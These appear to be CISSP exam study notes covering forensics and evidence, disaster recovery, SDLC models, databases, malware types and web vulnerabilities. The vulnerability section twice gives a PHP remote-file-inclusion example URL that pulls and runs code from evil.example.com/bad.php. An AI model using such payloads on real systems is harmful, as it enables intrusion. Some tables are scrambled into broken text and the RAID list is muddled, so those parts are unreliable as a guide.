 Honey Pot: Temp attacker to attack. (Trap) Detects the type of attack. Network of honeypot is
known as Honey Net.
 Enticement -- Legal
 Entrapment -- Illegal (Deliberate attempt to lure an attacker and then reporting against it)
 Pseudo Flaws: Intentional flaws to tempt attackers.
 Padded Cell: Similar to Honey Net. Once attacker attacks, IDS transfer the attacker to padded
cell without letting the attacker know.

Testing of DR Plan -RSSPF

1. Read through test: Copies of the DR plan is distributed.

2. Structured walkthrough: aka Table Top; scenario is discussed in a room over a table (To find
the errors and make improvement)
3. Simulation Test: Scenarios are performed and responses are developed.
4. Parallel test: Conducted at offsite but primary site is still operational (also relocate
employees)
5. Full interruption test: Main site is shut down.

Full & Incremental Backup reset the archive bit, while Differential Backup not

Evidence Admissible: Relevant, material to the case, must be obtained legally

Evidence Types:

1. Real Evidence: Which can be brought into court. (murder weapon)

2. Documentary: Written evidence (agreements etc.)
a. Best---> Original copy of document. (copies of the original document are called second-
ary evidence)
b. Parol---> Written agreement between parties.
3. Testimonial: verbal witness (Gawaah ;-))
4. Hearsay: Indirect (Whispers)

 Conclusive evidence is by far the least common type of evidence. This type proves without a
doubt that a crime has been committed. It is extremely rare. The most common forms are
direct, real, documentary, and demonstrative
 69

 Expert opinion evidence allows individuals to offer their opinion based upon the facts in
evidence and their personal knowledge

Chain of custody: proper chain of evidence collection should be maintained. Who handles evidence
at what moment should be properly documented. Any break in COC makes the evidence
inadmissible. (Very Important)

 Five Rules of Evidences: AACCA

1. Be Authentic
2. Be Accurate
3. Be Complete
4. Be Convincing
5. Be admissible

Legal Action:
 Confiscation: Confiscation (from the Latin confiscare "to consign to the fiscus, i.e. transfer
to the treasury") is a legal form of seizure by a government or other public authority. The
word is also used, popularly, of spoliation under legal forms, or of any seizure of property
as punishment or in enforcement of the law.
 Surrender Request: User is unaware of malicious activity associated, in case he is aware
confiscation is better options
 Obtain a Subpoena: A subpoena or witness summons is issued by a government agency,
most often a court, to compel testimony by a witness or production of evidence under a
penalty for failure
 Obtain a Warrant: A warrant is a legal document that allows someone to do something,
especially one that is signed by a judge or magistrate and gives the police permission to
arrest someone or search their house

 IPS/IDS Modes:
 True Positive: Identifies malicious as malicious
 True Negative: Identifies harmless as harmless
 False Positive: Identifies nonmalicious as malicious
 False Negative: Not identifies malicious traffic

 Types of Sensors
 Flame Sensor: Detects either infrared or ultraviolet light from a fire
 Heat Sensor: Ambient Temperature of an area
 Ionization Smoke Sensor: Radioactive emission to create the charge
 Photoelectric Smoke Sensor: Create the charge by LED
 Passive Infrared Motion Sensor: Body Heat
 Microwave Motion Sensor: Microwaves to generate Doppler Effect
 Ultrasonic Motion Sensor: Sound signals to generate Doppler Effect

 CFTT – Computer Forensics Tool Testing created by NIST for testing and certification of digital
forensics equipment

 The tumbler lock has more pieces and parts than a warded lock. The key fits into a cylinder,
which raises the lock metal pieces to the correct height so the bolt can slide to the locked or
unlocked position. A warded lock is easier to circumvent than a tumbler lock.

 if you want to cover a large area and not focus on specific items, it is best to use a wide-angle
lens and a small lens opening.
 70

 A Manual iris lenses have a ring around the CCTV lens that can be manually turned and
controlled. A lens that has a manual iris would be used in an area that has fixed lighting, since
the iris cannot self-adjust to changes of light. An auto iris lens should be used in environments
where the light changes, such as an outdoor setting. As the environment brightens, this is
sensed by the iris, which automatically adjusts itself. Security personnel will configure the
CCTV to have a specific fixed exposure value, which the iris is responsible for maintaining. The
other answers are true.

 Forensics is a science and an art that requires specialized techniques for the recovery,
authentication, and analysis of electronic data that could have been affected by a criminal act.
It is the coming together of computer science, information technology, and engineering with
the legal system. When discussing digital forensics with others, you might hear the terms
computer forensics, network forensics, electronic data discovery, cyberforensics, and forensic
computing. (ISC)2 uses digital forensics as a synonym for all of these other terms, so that’s
what you will most likely see on the CISSP exam. Digital forensics encompasses all domains in
which evidence is in a digital or electronic form, either in storage or on the wire.

The final step in a damage assessment is to declare a disaster.

 A skeleton crew consists of the employees who carry out the most critical functions following a
disaster. They are put to work first during the recovery process. A skeleton crew is not related
to the concept of executive succession planning, which addresses the steps that will be taken
to fill a senior executive role should that person retire, leave the company, or die. The
objective of a skeleton crew is to maintain critical operations, while the objective of executive
succession planning is to protect the company by maintaining leadership roles.

 In a manual recovery approach, the system does not fail into a secure state but requires an
administrator to manually restore operations. In an automated recovery, the system can
recover itself against one or more failure types. In an automated recovery without undue loss,
the system can recover itself against one or more failure types and also preserve data against
loss. In function recovery, the system can restore functional processes automatically.

 A forensic disk controller performs four functions. One of those, write blocking, intercepts
write commands sent to the device and prevents them from modifying data on the device. The
other three functions include returning data requested by a read operation, returning access-
signifcant information from the device, and reporting errors from the device back to the
forensic host.
 Latency is a delay in the delivery of packets from their source to their destination. Jitter is a
variation in the latency for different packets
 An attack committed against an organization by an insider, such as an employee, is known as
sabotage. Espionage and confidentiality breaches involve the theft of sensitive information,
which is not alleged to have occurred in this case
 Service bureau: A. An organization that can provide onsite or offsite IT services in the event of
a disaster
 System Center Confguration Manager (SCCM) provides this capability and is designed to allow
administrators to evaluate the confguration status of Windows workstations and servers, as well
as providing asset management data. SCOM is primarily used to monitor for health and
performance, Group Policy can be used for a variety of tasks including deploying settings and
software, and custom PowerShell scripts could do this but should not be required for a
confguration check
 If the data is very sensitive and has to travel outside of the company’s network, and SSL does
not provide the necessary level of protection, a VPN connection may be set up.
 71

 RAID 1 - Mirroring of drives. Data are written to two drives at once. RAID 2 - Data striping over
all drives at the bit level. RAID 3 - Data striping over all drives and parity data held on one
drive. RAID 3 - Byte-level parity RAID 4 - Block-level parity RAID 5 - Interleave parity RAID 1 –
Mirroring

 Penetration tests are usually concerned with how well technical controls have been deployed to
repel an adversary. Red team exercises typically have a broader scope, to include any aspect by
which an organization can be compromised, specifically including human and process problems.

 Companies need to be very careful about the items they use to entice intruders and attackers,
because they may be seen as entrapment by the court. It is best to get the legal department
involved before implementing these items. Putting a pseudo-flaw or honeypot in place is
usually seen as an enticement tool.

 The purpose of change management is to regulate projects that may disrupt business processes
in unanticipated ways. The purpose of configuration management is to ensure that deployed
controls are properly configured to counter current threats to the operational environment

 A system reboot takes place after the system shuts itself down in a controlled manner in
response to a kernel (trusted computing base) failure. (SR-TCB-CM)
 An emergency system restart takes place after a system failure happens in an uncontrolled
manner. (ESR-SYS-UM)
 A system cold start takes place when an unexpected kernel or media failure happens and the
regular recovery procedure cannot recover the system to a more consistent state.

 The following should take place within a change control program;

 Request for a change to take place Requests should be presented to an individual or group
that is responsible for approving changes and overseeing the activities of changes that take
place within an environment.
 Approval of the change The individual requesting the change must justify the reasons and
clearly show the benefits and possible pitfalls of the change.
 Documentation of the change Once the change is approved, it should be entered into a
change log. The log should be updated as the process continues toward completion.
 Tested and presented The change must be fully tested to uncover any unforeseen results.
Depending on the severity of the change and the company's organization, the change and
implementation may need to be presented to a change control committee.
 Implementation Once the change is fully tested and approved, a schedule should be
developed that outlines the projected phases of the change being implemented and the
necessary milestones.
 Report change to management A full report summarizing the change should be submitted to
management. This report can be submitted on a periodic basis to keep management up-to-
date and ensure continual support.
 The basic skill set of an incident response team member includes technical, recognition,
and response skills. While presentation skills would certainly be viewed as a plus, it is not a
basic requirement.

 The forensic process must preserve the “crime scene” and the evidence in order to prevent the
unintentional violation of the integrity of either the data or the data's environment. A primary
goal of forensics is to prevent unintentional modification of the system. Live forensics includes
taking a bit-by-bit image or binary image of physical memory, gathering details about running
processes, and gathering network connection data.
 When considering data retention policies, consider not only how long information should be
kept, but also how long the information needs to be accessible to the organization.
 72

 Zero-day vulnerabilities and zero-day exploits A zero-day vulnerability is a vulnerability that is

known before the existence of a patch. Zero-day vulnerabilities, also commonly written 0-day,
are becoming increasingly important as attackers are becoming more skilled in discovery and
disclosure of zero-day vulnerabilities is being monetized. A zero-day exploit, rather than
vulnerability, refers to the existence of exploit code for a vulnerability that has yet to be
patched.

 RAID 2: Hamming code RAID 2 is a legacy technology that requires either 14 or 39 hard disks and
a specially designed hardware controller, which makes RAID 2 cost prohibitive. RAID 2 stripes at
the bit level.

 Like RAID 3, RAID 4 employs a dedicated parity drive rather than having parity data distributed
amongst all disks, as in RAID 5.

 Business Continuity Plan (BCP) Provide procedures for sustaining essential business operations
while recovering from a significant disruption Addresses business processes; IT addressed based
only on its support for business process

 Business Recovery (or Resumption) Plan (BRP) Provide procedures for recovering business
operations immediately following a disaster Addresses business processes; not IT-focused; IT
addressed based only on its support for business process

 Continuity of Operations Plan (COOP) Provide procedures and capabilities to sustain an

organization's essential, strategic functions at an alternate site for up to 30 days Addresses the
subset of an organization's missions that are deemed most critical; usually written at
headquarters level; not IT-focused

 Continuity of Support Plan/ IT Contingency Plan Provide procedures and capabilities for
recovering a major application or general support system Same as IT contingency plan;
addresses IT system disruptions; not business process-focused

 Crisis Communications Plan Provides procedures for disseminating status reports to personnel
and the public Addresses communications with personnel and the public; not IT-focused

 Cyberincident Response Plan Provide strategies to detect, respond to, and limit consequences
of malicious cyber incident Focuses on information security responses to incidents affecting
systems and/ or networks

 Disaster Recovery Plan (DRP) Provide detailed procedures to facilitate recovery of capabilities
at an alternate site Often IT-focused; limited to major disruptions with long-term effects

 Occupant Emergency Plan (OEP) Provide coordinated procedures for minimizing loss of life or
injury and protecting property damage in response to a physical threat Focuses on personnel
and property particular to the specific facility; not business process or

Data Forensic Process – Need to remember

Digital Forensic – Be authentic, Accurate, Complete, Admissible, Convincing

Configuration Management – Read

Change Management - Read & Write

CAB – Only Approve critical changes

CCB – Configuration Control Board – All except critical changes

Change Management – Need to remember sequence

 73

Executive Emergency Management Team & Emergency Management Team

DR reports to Emergency Management Team

BCP Review – Yearly & Quarterly

DRP – Once in Year

IR Sensors – Active & Passive

Pin Tumbler & Wafer Tumbler

Warden & Tumbler Lock

 Follow Locard’s Exchange Principle during incident/investigations.

o When a crime is committed, the perpetrators leave something behind and take
something with them.
 Apple MOM Principle - Mean Opportunity Motive ( modus of operandi)
 Data Forensic Process
o - Data Collection
o - Data Examination
o - Data Analysis
o - Investigation Reporting

 One of the most important, yet overlooked, phases is the debriefing and feedback phase.
 Collecting and creating image of embedded devices is challenge for investigator.
 EDRM Process - Electronic Discovery Recovery Model eDiscovery - Information Governance
 The Electronic Discovery Reference Model (EDRM) is a framework that outlines standards for the
recovery and discovery and of digital data. The EDRM is designed to serve as guidance for
gathering and assimilating electronic data during the legal process, including criminal evidence
discovery.
 Data in Motion (network) - Network based DLP, It has capability DPI - Deep Packet Inspection (
Inspect header and content).
 Data in use (end-point) - Host based DLP most challenging aspect of the DLP. Ex: Copying data
through USB
 DRM is compensating control with DLP , Digital (Data) rights management (DRM) is a systematic
approach to copyright protection for digital media. The purpose of DRM is to prevent
unauthorized redistribution of digital media and restrict the ways consumers can copy content
they've purchased.
 CCB Focus: system versions,CM Plan with document all details of managing Configuration
management.
 Change Advisory board - approve/rejects the changes.
Classification:
 Ensure information is marked in such a way that only those with an appropriate level of
clearance can have access to the information.
Categorization:
 The process of determining the impact resulting from the loss of confidentiality, integrity or
availability of the information on an organization.
 Information Life Cycle ( ILC) managing and storing the data. There are six phases in ILC
 - Creation
 - Distribution
 - Use
 - Maintenance
 - Disclosure
 - Disposition
 SLA - Most important to consider is Right to Audit.
 The primary objective of incident management is limit the incident, to limit the impact to the
organization objectives, Incident Response is reactive control.( Corrective control)
 74

 Placement First IPS ( inline mode) followed by IDS (outline mode)

 Signature, pr pattern-matching: patterns from attack scenarios is much like extracting virus
signatures from infected ... intrusion detection problem as a pattern matching one,
 Protocol-anomaly based works by understanding the network protocols (which generally
requires having a protocol engine for each network protocol) and by checking or validating the
inputs for known abuses. In fact, much of this is really just part of the basic operation of the
firewall, creating sessions, matching packets to flows and sessions, and closing sessions.
 The Statistical Anomaly Detection method, also known as behavior-based detection, cross-
checks the current system operating characteristics on many base-line factors such as… …CPU
utilization, file access patterns and disk usages,

 Place IDSes directly behind firewalls, dual-homed proxies, routers, and VPN servers.
 Place IDSes next to single-homed proxies, servers, and wireless access points.
 Change Management Process Sequence Vs Security Focused Change Management Process
 Request SecCM Planning
 Impact Assessment

 Approval SecCM Implementation

 Build & Test
 Notification
 Implementation

 Validation SecCM Change Control

 Versioning & Baseline SecCM Monitoring

 DR Plan must be detailed so a person with skills but without experience executing the
procedures, could perform the recovery. The Plan needs to be distributed to everyone who has
a role in the case of Disaster Recovery. Recovery site - off site and command center.
 Executive Emergency Management Team - Consists of senior management response for
recovery. - Handles the strategic issues in case of Disaster.
 Emergency Management Team ( EMT): - Tactical ( Operational) level Includes people who
directly report to the command centre and oversee the recovery and restoration process
executed by the emergency response teams.

 Deter – Delay – Detect – Assess – Respond

 Deter - Sigs, lights, fences and guards
 Delay - barbed wire, locks and guards
 Detect - Access control systems, CCTV, sensors and monitoring
 Deny - Access control systems, guards and law
 Zero-day vulnerabilities and zero-day exploits A zero-day vulnerability is a vulnerability that is
known before the existence of a patch. Zero-day vulnerabilities, also commonly written 0-day,
are becoming increasingly important as attackers are becoming more skilled in discovery and
disclosure of zero-day vulnerabilities is being monetized. A zero-day exploit, rather than
vulnerability, refers to the existence of exploit code for a vulnerability that has yet to be
patched.

 GPG 2013 describes six Professional Practices (PP). • Management Practices • PP1 Policy and
Program Management • PP2 Embedding Business Continuity • Technical Practices • PP3 Analysis
• PP4 Design • PP5 Implementation • PP6 Validation8
 75

Domain 8

 Steps in System Development Life Cycle – IFSDDATCAI – IFDD – DATC - AIOR

1. Initiation & Planning

2. Functional requirements definition
3. System Design Specifications
4. Development & Implementation
5. Documentation and common program controls
6. Acceptance
7. Testing and evaluation controls
8. Certification
9. Accreditation
10. Implementation
11. Operations & Maintenance Support-------------------Only for System Life Cycle
12. Revisions and System replacement-------------------Only for System Life Cycle

Steps in System Development Life Cycle – as per NIST

13. Initiaition
14. Development/Acquisition
15. Implementation
16. Operational/Maintenance
17. Disposal
 76

Waterfall Spiral Rapid Application Clean Evolutionary

Development (RAD) Room Prototyping Model
Model

Disadvantages of Combination of Iterative, but spiral Zero The system concept

waterfall model: prototype and cycles are much Defects is refined
waterfall model smaller. continuously…
Once an application Good for short The focus is on
is in the testing duration projects. Risk-based “good enough”
stage, it is very Success of spiral approach, but focus concept,
difficult to go back model is all on “good enough” requirements, and
and change depends on how outcome. prototype.
good we handle However, it is
the risk SDLC fundamentals difficult to
assessment still apply… determine level of
Requirements, effort (LOE), cost,
configuration, and schedule.
and quality
management,
design process,
coding, test &
integration,
technical and
project reviews
etc

Other Development Models

 Joint Analysis Development (JAD) A method that uses a team approach in application
development in a workshop-oriented environment. •
 Rapid Application Development (RAD) A method that combines the use of prototyping and
iterative development procedures with the goal of accelerating the software development
process. •
 Reuse model A model that approaches software development by using progressively
developed models. Reusable programs are evolved by gradually modifying pre-existing
prototypes to customer specifications. Since the reuse model does not require programs to be
built from scratch, it drastically reduces both development cost and time. •
 Cleanroom An approach that attempts to prevent errors or mistakes by following structured
and formal methods of developing and testing. This approach is used for high-quality and
critical applications that will be put through a strict certification process.
 Component-based development involves the use of independent and standardized modules.
Each standard module consists of a functional algorithm or instruction set and is provided with
interfaces to communicate with each other
 The sashimi model has highly overlapping steps; it can be thought of as a real-world successor
to the waterfall model and is sometimes called the sashimi waterfall model.Sashimi’s steps are
similar to those of the waterfall model in that the difference is the explicit overlapping,
 XP is an Agile development method that uses pairs of programmers who work off a detailed
specification. There is a high level of customer involvement. “Extreme Programming improves a
software project in five essential ways; communication, simplicity, feedback, respect, and
courage.
 The spiral model is a software development model designed to control risk. The spiral model
repeats steps of a project, starting with modest goals, and expanding outwards in ever-wider
spirals called rounds.
 77

 An integrated product team (IPT) is a customer-focused group that focuses on the entire
lifecycle of a project. An Integrated Product Team (IPT) is a multidisciplinary group of people
who are collectively responsible for delivering a defined product or process.
 In regard to the Software Development Security domain, configuration management tracks
changes to a specific piece of software. Change management is broader in that it tracks
changes across an entire software development program.

 Distributed System Requirements – Interoperability, Portability, Transparency, Extensibility &

Security
 Generation 5 language is using constrain
 System Configuration in Operation and Maintenance

IDEAL Model Initiating, Diagnosing, Establishing, Acting & Learning

ACID Rules:

 Atomicity: Transaction be all or nothing. If one part of the transaction fails, then the
entire transaction fails, and the database state is left unchanged.
 Consistency: Data written to the database must be valid according to all defined rules.
 Isolation: Transactions must be in unique environment. No deadlock prob.
 Durability: ensures that once a transaction has been committed, it will remain so, even in
the event of power loss, crashes or errors.

Database Features

 Database Contamination: Mixing data with different classification

 Concurrency: Preventive mechanism. Protects integrity & availability. Uses lock & unlock
feature.
 Cell Suppression: Way of hiding a cell
 Polyinstantiation: Two or more rows in same relational table have identical primary keys.
Defense against Inference attack. -------------Database
 Perturbation (Noise): Meaningless data to protect confidentiality
 ODBC: Dictates how application communicates with databases. Act as proxy.
 Expert Systems: Knowledge Base + Inference Engines
 Knowledge Base: If/Else , Set of rules
 Inference Engine: Judgement of previous experience. Useful in Emergency Solution. Doesn't
affect emotion.
 Row – Tuple , Cardinality -RTC
 Column – Attribute, Degree -CAD
 PRIMARY KEY: Value which can be used to uniquely identify a record in table
 CANDIDATE KEY: Uniquely identify any record in table
 FOREIGN KEY: Referential Integrity. Enforce relationships between two tables
 The number of rows in the relation is referred to as the cardinality and the number of
columns is the degree.
 A data dictionary, or a metadata repository, is a centralized repository of information
about data, such as its meaning, relationships to other data, origin, usage, and format

Knowledge Based Systems

 Expert system : In artificial intelligence, an expert system is a computer system that emulates
the decision-making ability of a human expert
 Neural network: An information processing paradigm that is inspired by the way biological
nervous systems, such as the brain, process information.
 Decision support systems: (DSS) A set of related computer programs and the data required to
assist with analysis and decision-making within an organization.

 GANTT CHART: Project scheduling is done

 78

 PERT CHART (Project Evaluation Review Technique): Size of the product and standard devia-
tion of Risk assessment is calculated.

 CHANGE & CONFIGURATION MANAGEMENT:

(1) Request Control: Users request modification

(2) Change Control: Developers create code, testing happens & sent for manager’s approval
(3) Release Control: Once UAT is complete & manager has approved, code is deployed

 NEURAL NETWORK:

Chain of computational units used to imitate human brain.

Benefits – Linearity, I/O Adaptivity & mapping
Voice recognition, weather prediction
Delta rule, learning rule

 PROPAGATION TECHNIQUES:

(1) Master Boot Record Virus (MBR): Affects boot sector

(2) File Infection: Replaces original file with corrupted
(3) Macro Virus: Easy to write(VBA), very lethal Ex. I Love you
(4) Service Injection: Injecting into trusted runtime process.

 DECISION SUPPORT SYSTEM (DSS)

Knowledge base application that analyses business data & present in a way to make business
decision easier.
N IDES : Next Generation Intrusion Detection Expert System

 ANTIVIRUS: Signature Based

(1) Disinfect
(2) Quarantine
(3) Delete
 Relational: 2D (Rows & Column)

 Row – Tuple , Cardinality - RTC

 Column – Attribute, Degree - CAD
 PRIMARY KEY: Value which can be used to uniquely identify a record in table
 CANDIDATE KEY: Uniquely identify any record in table
 FOREIGN KEY: Referential Integrity. Enforce relationships between two tables

 VIRUS TECHNOLOGIES:

(1) Multipartite Viruses: More than one propagation technique

(2) Stealth Viruses: Hide themselves from getting detected
(3) Polymorphic Viruses: Modify their own code as they travel from system to system
(4) Encrypted Viruses: Use cryptographic techniques Short segment code – decryption routine
(5) Hoax: Circulating misleading information.
(6) Logic Bomb: Triggers on a logic (time based or event based)
(7) Trojan Horse: S/W that appears legitimate but carries malicious payload
(8) Ransomware: Encrypts documents & asks for ransom to decrypt it

 Hard-coded credentials: Backdoor username/ passwords left by programmers in production

code
 Buffer overflow: Occurs when a programmer does not perform variable bounds checking
 79

 SQL injection: manipulation of a back-end SQL server via a front-end web server
 Directory Path Traversal: escaping from the root of a web server (such as/ var/ www) into the
regular file system by referencing directories such as “../..”
 PHP Remote File Inclusion (RFI): altering normal PHP URLs and variables such as “http://
good.example.com? file = readme.txt” to include and execute remote content, such as http://
good.example.com? file = http:// evil.example.com/ bad.php14

Type-Safe: It is a programming language that can never be vulnerable to specific kind of Threats, it
prevents a variable from containing information that is different from the variable’s declaration

Risk Density – It is secure development metric that ranks security issues in order to quantify risk

Object Relational & Object Oriented Models are better suited for Computer aided design and
imaging

 Worms:

Code red – IIS

Stuxnet – Zero Days
RTM – Robert Tappan Morris

Attack Types

 Password  Application  Web App Security RECONNAISSANCE  MASQUARAD

ATTACKS ING ATTACK

• Password • Buffer Overflow (Bound • XSS (Persistent, Non- • IP Probes • IP Spoofing

guessing Check) persistent, DOM based) • Port Scans (Nmap) • Session High
• Dictionary • Time of Check to Time {Input Validation} • Vulnerability Scan jacking
attacks of Use • SQL Injection {Input (Nessus)
• Social • Back door (It involves Validation, Limit Access • Dumpster Diving
Engineering hard-coding secret Privileges , use stored
Counter authentication procedures)
Measure: credentials into an
Training & application)
Awareness • Rootkit and Escalation
of Privilege
UNIX: Password
shadowing / etc
/ shadow

 Obfuscation Types - In software development, obfuscation is the deliberate act of creating

source or machine code that is difficult for humans to understand.
o Lexical: Deals with renaming classes, fields, and methods
o Data: Modifying Data & Data Structures
o Control Flow: Making an application harder to understand or decompile
o Prevention: Difficult for compute to deobfuscate or to decompile code

 Testing Types -
o Negative/Boundary – Provides invalid information to ensure that it handles
appropriately
o Positive: To check application working as per design

Types of XSS Attack

 The nonpersistent cross-site (Reflected) scripting vulnerability is when the data provided by a
web client, most commonly in HTTP query parameters or in HTML form submissions, is used
 80

immediately by server-side scripts to generate a page of results for that user without properly
sanitizing the response.
 The persistent (Stored) XSS vulnerability occurs when the data provided by the attacker is
saved by the server and then permanently displayed on “normal” pages returned to other users
in the course of regular browsing without proper HTML escaping.
 DOM-based vulnerabilities occur in the content processing stages performed by the client,
typically in client-side JavaScript.

 Cross-site scripting: A. An attack that injects a malicious script into otherwise trusted websites.
 Cross-site request forgery: D. An attack that forces a user to execute unwanted actions in a
website or application they are currently logged in to. (mitigated by CAPTCHA)

Attack & Mitigation

 SQL Injection – Perform Input Validations, Limit Account Privileges

 XSS – Patched System, WAF, HIDS
 XSRF - CAPTCHA

Change Vs. Release Vs. Configuration Control

 The change control process is responsible for providing an organized framework within which
multiple developers can create and test a solution prior to rolling it out in a production
environment. Request control provides a framework for user requests.
 Release control manages the deployment of code into production.
 Configuration control ensures that changes to software versions are made in accordance with
the change and configuration management policies

 Web service provides the application functionality.

 WSDL describes the web service’s specifications.
 UDDI provides the mechanisms for web services to be posted and discovered.
 SOAP allows for the exchange of messages between a requester and provider of a web service.
 The Simple Object Access Protocol (SOAP) was created to use instead of Remote Procedure
Calls (RPCs) to allow applications to exchange information over the Internet. SOAP is an XML-
based protocol that encodes messages in a web service setup. It allows programs running on
different operating systems to communicate over web-based communication methods

Integrity

 A semantic integrity mechanism makes sure structural and semantic rules are enforced
 A database has referential integrity if all foreign keys reference existing primary keys
 Entity integrity guarantees that the tuples are uniquely identified by primary key values

 ActiveX control is client based technology that uses primarily Digital Certificate for security
control
 The most commonly used implementation of the hierarchical model is in the Lightweight
Directory Access Protocol (LDAP) model. You can find this model also used in the Windows
registry structure and different file systems, but it is not commonly used in newer database
products.
 KDD – Knowledge Discovery in Database is an emerging field which focuses on way of
understanding and analysing data in databases with focus on automation advancements also
called Data Mining
 Checkpoints create a fallback strategy for an application by enabling the user to return to a
point prior to the failure of some process. Savepoints and checkpoints are similar in nature. A
 81

savepoint is used to periodically save the state of the application and the user’s information,
whereas a checkpoint saves data held in memory to a temporary file

 In case of Application is embedded with Username, Password & API Keys, API key is more
dangerous to expose

Verification Vs Validation

Verification evaluates the product’s performance to the acclaimed functionalities and protection
levels
Validation ensures that the product satisfies the real-world problem it was developed to
accommodate and that actual performance and outputs are accurate

ADO - ActiveX Data Objects (ADO) is an API that allows applications to access back-end database
systems. It is a set of ODBC interfaces that exposes the functionality of data sources through
accessible objects

• It’s a high-level data access programming interface to an underlying data access

technology (such as OLE DB).
• It’s a set of COM objects for accessing data sources, not just database access.
• It allows a developer to write programs that access data, without knowing how the
database is implemented.
• SQL commands are not required to access a database when using ADO.
 The best programming uses the most cohesive modules possible, but because different modules
need to pass data and communicate, they usually cannot be totally cohesive. The lower the
coupling, the better the software design, because it promotes module independence.

OLE DB

 Object Linking and Embedding Database (OLE DB) separates data into components that run as
middleware on a client or server. It provides a low-level interface to link information across
different databases and provides access to data no matter where it is located or how it is
formatted. The following are some characteristics of OLE DB:
o • It’s a replacement for ODBC, extending its feature set to support a wider variety of
non relational databases, such as object databases and spreadsheets that do not
necessarily implement SQL.
o • A set of COM-based interfaces provide applications with uniform access to data stored
in diverse data sources
o • Because it is COM-based, OLE DB is limited to use by Microsoft Windows–based client
tools.
o • It allows different applications to access different types and sources of data.

 An object-relational database (ORD) or object-relational database management system

(ORDBMS) is a relational database with a software front end that is written in an object-
oriented programming language. Different companies will have different business logic that
needs to be carried out on the stored data. Allowing programmers to develop this front-end
software piece allows the business logic procedures to be used by requesting applications and
the data within the database.
 An OODB has the characteristics of ease of reusing code and analysis, reduced maintenance,
and an easier transition from analysis of the problem to design and implementation.

 A mashup is the combination of functionality, data, and presentation capabilities of two or

more sources to provide some type of new service or functionality. Open APIs and data sources
are commonly aggregated and combined to provide a more useful and powerful resource
 82

 The security posture of development platforms, code repositories, and software configurations
are the three overarching concerns for any software development environment

CMMI Level Maturity: Initial-Repeat-Defined-Manage-Optimize

 The basis of Defined level (CMMI Level 3) is that the organizations are capable of producing
their own standard of software processes. These processes are improved with the passage of
time.
 Initial Stage: Absence of formal process
 Defined: presence of basic lifecycle management processes and reuse of code
 Repeat - Organization introduce basic life-cycle management processes

Software Review Types

 Pass-around reviews are often done via email or using a central code review system, allowing
developers to review code asynchronously.
 Pair programming requires two programmers to work together, with one writing code and the
other reviewing and tracking progress.
 Team reviews are typically done in a group, and
 Fagan inspection is a formal review process that would involve both the developer and a team
to review the code using a formal process

 The best programming uses the most cohesive modules possible, but because different modules
need to pass data and communicate, they usually cannot be totally cohesive. The lower the
coupling, the better the software design, because it promotes module independence.

Lost Update Vs Dirty Read

 Lost updates occur when one transaction writes a value to the database that overwrites a value
needed by transactions that have earlier precedence, causing those transactions to read an
incorrect value. Dirty reads occur when one transaction reads a value from a database that was
written by another transaction that did not commit

 Signature detection is extremely effective against known strains of malware because it uses a
very reliable pattern matching technique to identify known malware

 Cross-site scripting (XSS) attacks may take advantage of the use of reflected input in a web
application where input provided by one user is displayed to another user.

 Client-side input validation is not an effective control against any type of attack because the
attacker can easily bypass the validation by altering the code on the client

 Compilers, Interpreters, and Bytecode ---Compilers take source code, such as C or Basic, and
compile it into machine code. Interpreted languages differ from compiled languages; for
example, interpreted code, such as shell code, is compiled on the fly each time the program is
run. Bytecode, such as Java bytecode, is also interpreted code.

 Computer-aided software engineering (CASE) uses programs to assist in the creation and
maintenance of other computer programs. Programming has historically been performed by
(human) programmers or teams, and CASE adds software to the programming “team.” There
are three types of CASE software: 1. “Tools: support only specific task in the software-
production process. 2. Workbenches: support one or a few software process activities by
integrating several tools in a single application. 3. Environments: support all or at least part of
the software-production process with a collection of Tools and Workbenches.” 2 Fourth-
generation computer languages, object-oriented languages, and GUIs are often used as
components of CASE.
 83

 The OWASP enterprise security API toolkits project includes these critical API controls: •
Authentication • Access control • Input validation • Output encoding/ escaping • Cryptography
• Error handling and logging • Communication security • HTTP security • Security
configuration12

 The object provides encapsulation (also called data hiding), which means that we do not know,
from the outside, how the object performs its function. This provides security benefits, so users
should not be exposed to unnecessary details.

 Object Request Brokers As we have seen previously, mature objects are designed to be reused,
as they lower risk and development costs. Object request brokers (ORBs) can be used to locate
objects because they act as object search engines. ORBs are middleware, which connects
programs to programs. Common object brokers included COM, DCOM, and CORBA.

 CMM Levels:-IRDMO

o Initial: The software process is characterized as ad hoc and occasionally even chaotic.
Few processes are defined, and success depends on individual effort.
o Repeatable: Basic project management processes are established to track cost,
schedule, and functionality. The necessary process discipline is in place to repeat
earlier successes on projects with similar applications.
o Defined: The software process for both management and engineering activities is
documented, standardized, and integrated into a standard software process for the
organization. Projects use an approved, tailored version of the organization’s standard
software process for developing and maintaining software.
o Managed: Detailed measures of the software process and product quality are collected,
analyzed, and used to control the process. Both the software process and products are
quantitatively understood and controlled.
o Optimizing: Continual process improvement is enabled by quantitative feedback from
the process and from piloting innovative ideas and technologies

 Acceptance Testing:

 The ISTQB also lists four levels of acceptance testing: •

 “The User Acceptance test: focuses mainly on the functionality, thereby validating the
fitness-for-use of the system by the business user. The user acceptance test is performed
by the users and application managers. •
 The Operational Acceptance test: also known as Production Acceptance test validates
whether the system meets the requirements for operation. In most of the organization, the
operational acceptance test is performed by the system administration before the system is
released. The operational acceptance test may include testing of backup/ restore, disaster
recovery, maintenance tasks, and periodic check of security vulnerabilities. •
 Contract Acceptance testing: performed against the contract’s acceptance criteria for
producing custom-developed software. Acceptance should be formally defined when the
contract is agreed. •
 Compliance acceptance testing: also known as regulation acceptance testing, which is
performed against the regulations that must be followed, such as governmental, legal, or
safety regulations.” 17

 In a gray box test, the tester evaluates the software from a user perspective but has access
to the source code as the test is conducted. White box tests also have access to the source
code but perform testing from a developer’s perspective. Black box tests work from a
user’s perspective but do not have access to source code. Blue boxes are a telephone
hacking tool and not a software testing technique
 Third Party Vendor Software – Conduct testing against defined software security baseline

 Software Vulnerabilities
 84

o Hard-coded credentials: Backdoor username/ passwords left by programmers in

production code
o Buffer overflow: Occurs when a programmer does not perform variable bounds
checking
o SQL injection: manipulation of a back-end SQL server via a front-end web server
o Directory Path Traversal: escaping from the root of a web server (such as/ var/ www)
into the regular file system by referencing directories such as “../..”
o PHP Remote File Inclusion (RFI): altering normal PHP URLs and variables such as
“http:// good.example.com? file = readme.txt” to include and execute remote
content, such as http:// good.example.com? file = http:// evil.example.com/
bad.php14

 Here is a summary of OOP concepts illustrated by Addy: • Object: Addy • Class: Mathematical
operators • Method: Addition • Inheritance: Addy inherits an understanding of numbers and
math from his parent class mathematical operators. The programmer simply needs to program
Addy to support the method of addition • Example input message: 1 + 2 • Example output
